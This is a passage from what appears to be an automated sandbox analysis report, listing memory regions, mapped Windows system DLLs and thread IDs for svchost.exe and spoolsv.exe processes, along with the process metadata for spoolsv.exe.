0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2393 start_va = 0x7ffc4a100000 end_va = 0x7ffc4a17ffff entry_point = 0x7ffc4a100000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2394 start_va = 0x7ffc4b170000 end_va = 0x7ffc4b1cefff entry_point = 0x7ffc4b170000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2395 start_va = 0x7ffc4b8c0000 end_va = 0x7ffc4b8d4fff entry_point = 0x7ffc4b8c0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2396 start_va = 0x7ffc4bc70000 end_va = 0x7ffc4bf51fff entry_point = 0x7ffc4bc70000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 2397 start_va = 0x7ffc4c030000 end_va = 0x7ffc4c044fff entry_point = 0x7ffc4c030000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 2398 start_va = 0x7ffc4c050000 end_va = 0x7ffc4c0aefff entry_point = 0x7ffc4c050000 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 2399 start_va = 0x7ffc4c0b0000 end_va = 0x7ffc4c10ffff entry_point = 0x7ffc4c0b0000 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 2400 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2401 start_va = 0x7ffc4f690000 end_va = 0x7ffc4f6a7fff entry_point = 0x7ffc4f690000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2402 start_va = 0x7ffc4f6b0000 end_va = 0x7ffc4f832fff entry_point = 0x7ffc4f6b0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2403 start_va = 0x7ffc4f840000 end_va = 0x7ffc4f863fff entry_point = 0x7ffc4f840000 region_type = mapped_file name = "cryptcatsvc.dll" filename = "\\Windows\\System32\\cryptcatsvc.dll" (normalized: "c:\\windows\\system32\\cryptcatsvc.dll") Region: id = 2404 start_va = 0x7ffc4f870000 end_va = 0x7ffc4f882fff entry_point = 0x7ffc4f870000 region_type = mapped_file name = "crypttpmeksvc.dll" filename = "\\Windows\\System32\\crypttpmeksvc.dll" (normalized: "c:\\windows\\system32\\crypttpmeksvc.dll") Region: id = 2405 start_va = 0x7ffc4f890000 end_va = 0x7ffc4f8a6fff entry_point = 0x7ffc4f890000 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 2406 start_va = 0x7ffc503b0000 end_va = 0x7ffc503f8fff entry_point = 0x7ffc503b0000 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 2407 start_va = 0x7ffc50970000 end_va = 0x7ffc50979fff entry_point = 0x7ffc50970000 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 2408 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2409 start_va = 0x7ffc509f0000 end_va = 0x7ffc50a38fff entry_point = 0x7ffc509f0000 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 2410 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2411 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2412 start_va = 0x7ffc50bd0000 end_va = 0x7ffc50bebfff entry_point = 0x7ffc50bd0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2413 start_va = 0x7ffc50ec0000 end_va = 0x7ffc50ed7fff entry_point = 0x7ffc50ec0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2414 start_va = 0x7ffc51180000 end_va = 0x7ffc511acfff entry_point = 0x7ffc51180000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2415 start_va = 0x7ffc511b0000 end_va = 0x7ffc51332fff entry_point = 0x7ffc511b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2416 start_va = 0x7ffc514b0000 end_va = 0x7ffc514c5fff entry_point = 0x7ffc514b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2417 start_va = 0x7ffc51570000 end_va = 0x7ffc51580fff entry_point = 0x7ffc51570000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2418 start_va = 0x7ffc516e0000 end_va = 0x7ffc51759fff entry_point = 0x7ffc516e0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2419 start_va = 0x7ffc51760000 end_va = 0x7ffc5181ffff entry_point = 0x7ffc51760000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2420 start_va = 0x7ffc519c0000 end_va = 0x7ffc51a24fff entry_point = 0x7ffc519c0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2421 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2422 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2423 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2424 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2425 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2426 start_va = 0x7ffc53830000 end_va = 0x7ffc5383bfff entry_point = 0x7ffc53830000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2427 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2428 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2429 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2430 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2431 start_va = 0x7ffc53f30000 end_va = 0x7ffc53f65fff entry_point = 0x7ffc53f30000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2432 start_va = 0x7ffc53f70000 end_va = 0x7ffc53f95fff entry_point = 0x7ffc53f70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2433 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2434 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2435 start_va = 0x7ffc542c0000 end_va = 0x7ffc542e0fff entry_point = 0x7ffc542c0000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 2436 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2437 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2438 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2439 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2440 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2441 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2442 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2443 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2444 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2445 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2446 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2447 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2448 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2449 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2450 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2451 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2452 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2453 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2454 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2455 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2456 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2457 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2458 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 318 os_tid = 0xf7c Thread: id = 319 os_tid = 0xf78 Thread: id = 320 os_tid = 0xf74 Thread: id = 321 os_tid = 0xf70 Thread: id = 322 os_tid = 0xe08 Thread: id = 323 os_tid = 0x6d0 Thread: id = 324 os_tid = 0x988 Thread: id = 325 os_tid = 0x96c Thread: id = 326 os_tid = 0x4e4 Thread: id = 327 os_tid = 0x908 Thread: id = 328 os_tid = 0x824 Thread: id = 329 os_tid = 0x814 Thread: id = 330 os_tid = 0x428 Thread: id = 331 os_tid = 0x6b8 Thread: id = 332 os_tid = 0x6ac Thread: id = 333 os_tid = 0x6a8 Thread: id = 334 os_tid = 0x5c4 Thread: id = 335 os_tid = 0x528 Thread: id = 336 os_tid = 0x47c Thread: id = 337 os_tid = 0x478 Thread: id = 338 os_tid = 0x468 Thread: id = 339 os_tid = 0x458 Thread: id = 340 os_tid = 0x438 Thread: id = 341 os_tid = 0x430 Thread: id = 342 os_tid = 0x42c Thread: id = 343 os_tid = 0x380 Thread: id = 344 os_tid = 0x144 Thread: id = 345 os_tid = 0x25c Thread: id = 461 os_tid = 0xe48 Thread: id = 488 os_tid = 0x628 Process: id = "13" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x6daad000" os_pid = "0x164" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010d69" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3156 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 3157 start_va = 0x120000 end_va = 0x126fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 3158 start_va = 0x130000 end_va = 0x143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3159 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3160 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3161 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3162 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3163 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3164 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3165 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "spoolsv.exe.mui" filename = "\\Windows\\System32\\en-US\\spoolsv.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\spoolsv.exe.mui") Region: id = 3166 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 3167 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 3168 start_va = 0x2f0000 end_va = 0x2f6fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3169 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3170 start_va = 0x400000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3171 start_va = 0x590000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 3172 start_va = 0x720000 end_va = 0x7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3173 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 3174 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 3175 start_va = 0x860000 end_va = 0x860fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 3176 start_va = 0x870000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 3177 start_va = 0x8f0000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 3178 start_va = 0x930000 end_va = 0x936fff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 3179 start_va = 0x940000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 3180 start_va = 0x950000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 3181 start_va = 0x960000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 3182 start_va = 0x970000 end_va = 0xca6fff entry_point = 0x970000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3183 start_va = 0xcb0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 3184 start_va = 0xdb0000 end_va = 0xdc3fff entry_point = 0xdb0000 region_type = mapped_file name = "localspl.dll.mui" filename = "\\Windows\\System32\\en-US\\localspl.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\localspl.dll.mui") Region: id = 3185 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 3186 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0xe10000 region_type = mapped_file name = "wsdmon.dll.mui" filename = "\\Windows\\System32\\en-US\\WSDMon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsdmon.dll.mui") Region: id = 3187 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 3188 start_va = 0xe30000 end_va = 0xe30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e30000" filename = "" Region: id = 3189 start_va = 0xe40000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 3190 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0xf40000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 3191 start_va = 0xf50000 end_va = 0xf56fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 3192 start_va = 0xf60000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 3193 start_va = 0xfa0000 end_va = 0xfa0fff entry_point = 0xfa0000 region_type = mapped_file name = "win32spl.dll.mui" filename = "\\Windows\\System32\\en-US\\win32spl.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\win32spl.dll.mui") Region: id = 3194 start_va = 0xfb0000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 3195 start_va = 0xfc0000 end_va = 0x109efff entry_point = 0xfc0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3196 start_va = 0x10a0000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 3197 start_va = 0x11a0000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 3198 start_va = 0x13a0000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 3199 start_va = 0x13e0000 end_va = 0x141ffff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 3200 start_va = 0x1420000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 3201 start_va = 0x1460000 end_va = 0x149ffff entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 3202 start_va = 0x14e0000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 3203 start_va = 0x1520000 end_va = 0x1520fff entry_point = 0x1520000 region_type = mapped_file name = "inetpp.dll.mui" filename = "\\Windows\\System32\\en-US\\inetpp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inetpp.dll.mui") Region: id = 3204 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3205 start_va = 0x7df5ffc90000 end_va = 0x7ff5ffc8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc90000" filename = "" Region: id = 3206 start_va = 0x7ff7c7d5e000 end_va = 0x7ff7c7d5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7d5e000" filename = "" Region: id = 3207 start_va = 0x7ff7c7d62000 end_va = 0x7ff7c7d63fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7d62000" filename = "" Region: id = 3208 start_va = 0x7ff7c7d64000 end_va = 0x7ff7c7d65fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7d64000" filename = "" Region: id = 3209 start_va = 0x7ff7c7d66000 end_va = 0x7ff7c7d67fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7d66000" filename = "" Region: id = 3210 start_va = 0x7ff7c7d68000 end_va = 0x7ff7c7d69fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7d68000" filename = "" Region: id = 3211 start_va = 0x7ff7c7d6a000 end_va = 0x7ff7c7d6bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7d6a000" filename = "" Region: id = 3212 start_va = 0x7ff7c7d6c000 end_va = 0x7ff7c7d6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7d6c000" filename = "" Region: id = 3213 start_va = 0x7ff7c7d6e000 end_va = 0x7ff7c7d6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7d6e000" filename = "" Region: id = 3214 start_va = 0x7ff7c7d70000 end_va = 0x7ff7c7e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7c7d70000" filename = "" Region: id = 3215 start_va = 0x7ff7c7e70000 end_va = 0x7ff7c7e92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7c7e70000" filename = "" Region: id = 3216 start_va = 0x7ff7c7e95000 end_va = 0x7ff7c7e96fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7e95000" filename = "" Region: id = 3217 start_va = 0x7ff7c7e97000 end_va = 0x7ff7c7e98fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7e97000" filename = "" Region: id = 3218 start_va = 0x7ff7c7e99000 end_va = 0x7ff7c7e99fff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7e99000" filename = "" Region: id = 3219 start_va = 0x7ff7c7e9a000 end_va = 0x7ff7c7e9bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7e9a000" filename = "" Region: id = 3220 start_va = 0x7ff7c7e9c000 end_va = 0x7ff7c7e9dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7e9c000" filename = "" Region: id = 3221 start_va = 0x7ff7c7e9e000 end_va = 0x7ff7c7e9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7c7e9e000" filename = "" Region: id = 3222 start_va = 0x7ff7c8010000 end_va = 0x7ff7c80d4fff entry_point = 0x7ff7c8010000 region_type = mapped_file name = "spoolsv.exe" filename = "\\Windows\\System32\\spoolsv.exe" 